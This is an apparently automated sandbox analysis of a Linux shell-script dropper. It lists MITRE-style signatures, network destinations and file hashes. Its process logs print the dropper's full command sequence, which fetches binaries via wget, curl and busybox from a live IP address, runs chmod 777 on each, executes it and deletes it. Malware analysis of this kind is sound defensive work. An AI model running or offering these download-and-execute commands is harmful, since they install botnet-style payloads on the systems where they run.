Analysis Overview
SHA256
74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc
Threat Level: Shows suspicious behavior
The file 74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
System Network Configuration Discovery
Writes file to tmp directory
Reads runtime system information
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-14 02:38
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
ubuntu1804-amd64-20240508-en
Max time kernel
31s
Max time network
129s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
[./cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/rm
[rm cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/wget
[wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/chmod
[chmod 777 KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F
[./KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/bin/rm
[rm KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F]
/usr/bin/wget
[wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/chmod
[chmod 777 IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L
[./IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/bin/rm
[rm IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L]
/usr/bin/wget
[wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/chmod
[chmod 777 FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG
[./FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/bin/rm
[rm FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG]
/usr/bin/wget
[wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/chmod
[chmod 777 ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt
[./ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
/bin/rm
[rm ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| GB | 185.125.188.62:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.193.91:443 | | tcp |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.193.91:443 | | tcp |
| GB | 89.187.167.9:443 | | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| US | 1.1.1.1:53 | 1527653184.rsc.cdn77.org | udp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
Files
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-14 02:38
Reported
2024-11-14 02:41
Platform
debian9-armhf-20240729-en
Max time kernel
37s
Max time network
39s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | N/A |
| N/A | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | N/A |
| N/A | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | N/A |
| N/A | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | N/A |
| N/A | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | N/A |
| N/A | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | N/A |
| N/A | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | N/A |
| N/A | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | N/A |
| N/A | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | N/A |
| N/A | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | N/A |
| N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
| N/A | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | N/A |
| N/A | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | N/A |
| N/A | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | N/A |
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/IROgYu8JeS7aHEYocEL33Q6hU8dwxgdy6L | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak | /usr/bin/curl | N/A |
| File opened for modification | /tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KiPZx4shY7WXxXcOQVAYqR81gltVu2Td5F | /usr/bin/curl | N/A |
| File opened for modification | /tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FcX3T8zb6LDxiavSzJKf0E6VPR1uJMMhOG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZDKzhoxaz9R5Bx9zxkw8yjZ6P9ykvdzDFt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi | /usr/bin/curl | N/A |
Processes
/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh
[/tmp/74c36db9f9e988e2a1bc2a17a8fb9787f90b989edadc068c431bd0b5acd3afcc.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/chmod
[chmod 777 YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/tmp/YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I
[./YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/bin/rm
[rm YsLXsXQJffIbMVH9DgZXi9b6gps0vRzt4I]
/usr/bin/wget
[wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/chmod
[chmod 777 VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/tmp/VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS
[./VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/bin/rm
[rm VYY7atZJrfyinw3gbKgTE9tgDHLZ4zOMZS]
/usr/bin/wget
[wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/chmod
[chmod 777 fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/tmp/fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd
[./fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/bin/rm
[rm fnMtWZX3IZ8hlvkm7lnMKMSDYjiscMmGFd]
/usr/bin/wget
[wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/chmod
[chmod 777 H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/tmp/H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS
[./H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/bin/rm
[rm H8FkyqpdfXMoXO0BYJpD1sbCn5ye1xsakS]
/usr/bin/wget
[wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/chmod
[chmod 777 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/tmp/4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi
[./4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/bin/rm
[rm 4sBtqA7I84QsXoN99YqLNzNJsj9FRLrnoi]
/usr/bin/wget
[wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/chmod
[chmod 777 RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/tmp/RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed
[./RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/bin/rm
[rm RPXFIZWdU1AIAIwMjnpgDpH60W7KW8bCed]
/usr/bin/wget
[wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/chmod
[chmod 777 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/tmp/1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE
[./1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/bin/rm
[rm 1sTn1Y0UnDxLbmdWxLtnKrGqA6lt9Jk7sE]
/usr/bin/wget
[wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/chmod
[chmod 777 wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/tmp/wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ
[./wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/bin/rm
[rm wTEDK3MCAv6KXj5EVQxPZEFIbKVL78ZsVQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/chmod
[chmod 777 H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/tmp/H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak
[./H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/bin/rm
[rm H9V9m6knvYYGckfXaKe6Jh0GbKifmOcHak]
/usr/bin/wget
[wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/bin/chmod
[chmod 777 cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ]
/tmp/cPLtelFrN3FGunrrZ459BVZNoCCf3xDYeZ
